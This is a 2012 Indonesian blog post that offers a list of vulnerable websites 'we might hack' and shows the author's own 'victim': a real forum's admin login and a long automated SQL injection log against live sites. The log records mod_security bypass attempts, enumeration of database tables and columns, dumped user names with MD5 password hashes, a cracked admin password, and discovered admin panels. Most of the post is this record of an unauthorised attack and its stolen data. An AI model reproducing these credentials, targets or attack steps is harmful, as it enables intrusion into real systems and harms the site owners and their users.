Kamis, 14 Juni 2012

List Web Vuln

By: Libraers on 23.52
Share it Please
 https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih1ZKSYeESBmBmngm3-StkDel166NvcPzmKGq_ZYXe23TkUVE1S8mHfELIxSjH9Wqg5dSlc30Y5PQtj_T8A2LCTzieOUq0etpM_i-gVvch0nmdwTqMfqcjsdMNz_vTH44tvFYXH7sNIbSG/+Websites+Vulnerable+To+Attack+%2521.jpg

















Di dalam blog ini ada page yang menyediakan web vuln yang mungkin bisa kita hack

Update 15/06/2012

Tinggal masuk aja

http://www.libraers.co.cc/p/list-web-vuln.html

Nanti bila saya ketemu lagi dengan list yang baru dan masih segar saya akan perbarui.
Terimakasih.

Contoh korban saya :

http://bbs.yayu.org/
username : admin
Password : admin

Host IP: 74.53.235.62
Web Server: Apache
Keyword Found: Database
Finding Injection type...
Http Error: 403 Forbidden
Injection type is Integer
Keyword corrected: Apache
Http Error: 403 Forbidden
Can't find db server type! But maybe there be some chances! [-o<
Finding columns count(MySQL,MsSQL 2005): 1
Http Error: 403 Forbidden
Turning on mod_security bypass
Finding columns count(MySQL,MsSQL 2005): 1
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 2
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 3
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 4
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 5
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 6
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 7
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 8
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 9
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 10
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 11
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 12
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 13
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 14
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 15
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 16
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 17
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 18
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 19
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 20
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 21
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 22
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 23
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 24
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 25
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 26
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 27
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 28
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 29
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 30
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 31
Http Error: 403 Forbidden
Finding columns count(MySQL,MsSQL 2005): 32
Http Error: 403 Forbidden
Trying another method using keyword for finding columns count
Finding columns count(MySQL,MsSQL 2005): 1
Http Error: 403 Forbidden
Selected Column Count is 1
Finding string column: 1
Http Error: 403 Forbidden
Retying to find string column
Finding string column: 1
Http Error: 403 Forbidden
Finding string column: 1
Http Error: 403 Forbidden
Retying to find string column
Finding string column: 1
Http Error: 403 Forbidden
Finding string column: 1
Http Error: 403 Forbidden
Retying to find string column
Finding string column: 1
Http Error: 403 Forbidden
Finding string column: 1
Http Error: 403 Forbidden
Retying to find string column
Finding string column: 1
Http Error: 403 Forbidden
Finding string column: 1
Http Error: 403 Forbidden
Retying to find string column
Finding string column: 1
Http Error: 403 Forbidden
Finding string column: 1
Http Error: 403 Forbidden
Retying to find string column
Finding string column: 1
Http Error: 403 Forbidden
Cannot find string column!
Testing for MySQL error based injection method
Http Error: 403 Forbidden
Bypassing illegal union failed! Turning off this feature
Http Error: 403 Forbidden
MySQL error based injection method cant be used!
Trying blind method
Finding current data base
It seems that target is not vulnerable. it's a false positive, Injection Failed!
Testing for MsSQL time based injection with 1000 ms delay
Http Error: 403 Forbidden
Http Error: 403 Forbidden
MsSQL time based injection method can't be used
Testing for MySQL time based injection with 878 ms delay
Http Error: 403 Forbidden
Http Error: 403 Forbidden
MySQL time based injection method can't be used
Analyzing http://spokesrecords.com/releases.php?id=12'
Host IP: 212.227.63.47
Web Server: Apache/1.3.41 Ben-SSL/1.59
Powered-by: PHP/5.2.17
Can not find keyword but let me do a try!
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
Can't find db server type! But maybe there be some chances! [-o<
Trying again to find columns count with string type(MySQL,MsSQL 2005): 19
Canceling...
Cannot find column count!
MySQL error based injection method cant be used!
Job Canceled!
Analyzing http://bbs.yayu.org/look.php?id=227
Host IP: 69.89.31.137
Web Server: Apache
Keyword Found: **************[yayu2011-08-01
Injection type is Integer
Keyword corrected: HaCked
DB Server: MySQL >=5
Selected Column Count is 14
Valid String Column is 1
Current DB: somelogc_yayu
Count(table_name) of information_schema.tables where table_schema=0x736F6D656C6F67635F79617975 is 41
Tables found: article,attention,bbsusers,blog_article,blog_category,blog_link,blog_review,blog_tags,bzrz,cate,cate_jmww,category1,category2,consumer,down,ewebeditor_button,ewebeditor_style,ewebeditor_system,ewebeditor_toolbar,info,inform,ip_user,jmww,link,message,music,news,news_art,news_artbar,news_bclass,news_comment,news_sclass,pl,rank,rearticle,users,vod,vote,wap_test,wz,wzpl
Count(column_name) of information_schema.columns where table_schema=0x736F6D656C6F67635F79617975 and table_name=0x6262737573657273 is 20
Columns found: id,id_rank,space,command,name,password,question,answer,fristtime,email,qq,homepage,sex,introduction,lasttime,lasttime_now,num_land,length_land_total,length_land_now,ip
Count(column_name) of information_schema.columns where table_schema=0x736F6D656C6F67635F79617975 and table_name=0x69705F75736572 is 6
Columns found: id,id_user,name,urled,ip,time
Count(column_name) of information_schema.columns where table_schema=0x736F6D656C6F67635F79617975 and table_name=0x7573657273 is 5
Columns found: id,name,password,dj,email
Count(*) of somelogc_yayu.users is 3
Data Found: name,password=yayu^976c56233e31e5860ea0e7665ac228cd
Data Found: name,password=letter^202cb962ac59075b964b07152d234b70
Data Found: name,password=admin^21232f297a57a5a743894a0e4a801fc3
Cracking hash: 21232f297a57a5a743894a0e4a801fc3
Job Canceled! Plain text of 21232f297a57a5a743894a0e4a801fc3 is admin
Finding admin page: http://bbs.yayu.org/
Page Found: http://bbs.yayu.org/login.php
Current Page (157/410): http://bbs.yayu.org/authadmin.asp
Page Found: http://bbs.yayu.org/controlpanel/
Page Found: http://bbs.yayu.org/cpanel/
Page Found: http://bbs.yayu.org/kpanel/
Job Finished
Diposting oleh di
Label: ,

1 komentar:

Berkomentarlah demi kemajuan blog ini..

Langganan: Posting Komentar (Atom)

Recent Posts

Top

Designed By Templateism | Seo Blogger Templates